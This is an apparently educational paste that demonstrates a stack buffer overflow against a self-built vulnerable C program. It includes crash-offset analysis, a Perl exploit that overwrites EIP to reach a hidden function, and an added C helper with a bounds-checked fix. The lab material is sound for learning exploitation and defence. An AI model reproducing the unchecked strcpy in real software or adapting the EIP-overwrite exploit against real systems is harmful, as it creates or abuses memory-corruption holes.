viprajput

g2s10 overflow

Jul 17th, 2018
Buffer Overflow
A buffer overflow is the condition that arises when the developer has not deployed proper exception handling, which lets an attacker overwrite the application's EIP with the address of malicious code.
EIP holds the return address, which is critical for the application. As an attacker we pass far more data than the buffer can hold; the data exceeds the buffer's limit and overwrites the application's EIP (return address).

Requirement
1. Windows OS
2. OllyDBG
3. Vulnerable Application --> Custom Based (we will create)
   C compiler --> DevCPP 4.9.9.2
4. Perl --> For creating an exploit

Example of argc and argv[]:

nmap -sS -sC -sV 192.168.0.1
  0   1   2   3   4

argc ---> number of arguments
argv[] -> contains the value of arguments
argv[0] -> nmap
argv[1] -> -sS
argv[2] -> -sC
argv[3] -> -sV
argv[4] -> 192.168.0.1

code.c
======

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int overflow(char *s)
{
    char buffer[10];    /* this is our buffer: only 10 bytes */
    strcpy(buffer, s);  /* vulnerable code: no length check, so a long argv[1] runs past the buffer and over the saved return address */
    return 0;
}

void exploit(void)      /* the function we want to reach by overwriting EIP */
{
    printf("Buffer Overflow Chal gya....\n");
}

int main(int argc, char *argv[])
{
    int a = 0;
    printf("Aap log main wale function me ho.....\n");
    overflow(argv[1]);  /* argv[1] is copied into the 10-byte buffer */
    if (a == 1)         /* never true: exploit() is only reached through the overwritten EIP */
    {
        exploit();
    }
    else
    {
        printf("Pappu ka Buffer Overflow fail ho gya hai....\n");
    }
    return 0;
}
==================

00401316 |. E8 94FFFFFF CALL goku.004012AF

00401316 ---> exploit (the CALL to goku.004012AF shown above)

goku.exe LuciferTheMorningStarTheFirstFallenAngel
crash
Exception Offset: 6c:61:46:74 --> EIP

A --> 41

goku.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
41414141

Exception Offset: 41414141
A A A A

00401316 ---> Normal Form
EIP always reads data in Little Endian Form
00401316
00 40 13 16
16 13 40 00 ----> Little Endian Form

Pattern used to locate the position of the EIP overwrite:
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

goku.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
Exception Offset: 35376239

35376239
35 37 62 39
39 62 37 35 ----> Little Endian Form = "9b75"

Search for 9b75 in the pattern:
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

1e66186a8e7f4a61ebaae3f46ae2 9b75 ----> 28 bytes before the EIP

A --> 41
B --> 42
C --> 43
D --> 44
E --> 45

AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
42434445
45444342

Exception Offset: 45444342

vegeta.pl
=========
use strict;
use warnings;

my $junk = "\x41" x 28;          # 28 bytes of junk data (fills the buffer up to the saved EIP)
my $eip = "\x16\x13\x40\x00";    # address of my exploit code, 00401316 in little-endian order
my $exploit = $junk . $eip;      # concatenating the two strings
print "Buffer Overflow Chalne wala hai....\n";
system("goku.exe", $exploit);
print "Goku wale Buffer Overflow ko shadi mubarak ho.....\n";
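An added example (not part of the original paste) that performs the same crash analysis in C: it turns the faulting EIP value back into the bytes as they lay on the stack, locates them in the pattern to obtain the 28-byte junk length, converts the address 00401316 into the little-endian byte order that vegeta.pl hard-codes, and shows a bounds-checked counterpart of overflow() that rejects oversized input instead of copying it. The pattern and addresses are the ones from the notes above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The pattern from the notes above, passed as argv[1] to goku.exe. */
const char PATTERN[] =
    "1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44d"
    "d919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba";

/* Write a 32-bit value in the order x86 stores it in memory (little-endian):
 * 0x00401316 becomes 16 13 40 00, the byte string vegeta.pl uses. */
void le32_bytes(uint32_t value, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Given the faulting EIP, find where its four bytes sit in the pattern; that
 * position is the number of bytes before the saved return address (the junk
 * length). Returns -1 if not found. Relies on the pattern being printable
 * ASCII, so the needle contains no NUL and strstr() can be used. */
int eip_to_offset(const char *pattern, uint32_t eip)
{
    unsigned char needle[5];
    le32_bytes(eip, needle);
    needle[4] = '\0';
    const char *hit = strstr(pattern, (const char *)needle);
    return hit ? (int)(hit - pattern) : -1;
}

/* Bounds-checked counterpart of the page's overflow(): input that does not
 * fit in the 10-byte buffer is rejected instead of being copied over EIP. */
int overflow_safe(const char *s)
{
    char buffer[10];
    size_t len = strlen(s);
    if (len >= sizeof buffer)
        return -1;                   /* too long for the buffer */
    memcpy(buffer, s, len + 1);      /* fits, including the terminating NUL */
    return 0;
}

int main(void)
{
    unsigned char ret[4];
    printf("junk bytes before EIP: %d\n", eip_to_offset(PATTERN, 0x35376239u));
    le32_bytes(0x00401316u, ret);
    printf("00401316 in memory order: %02x %02x %02x %02x\n",
           ret[0], ret[1], ret[2], ret[3]);
    return 0;
}
```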
https://ufile.io/s6f8v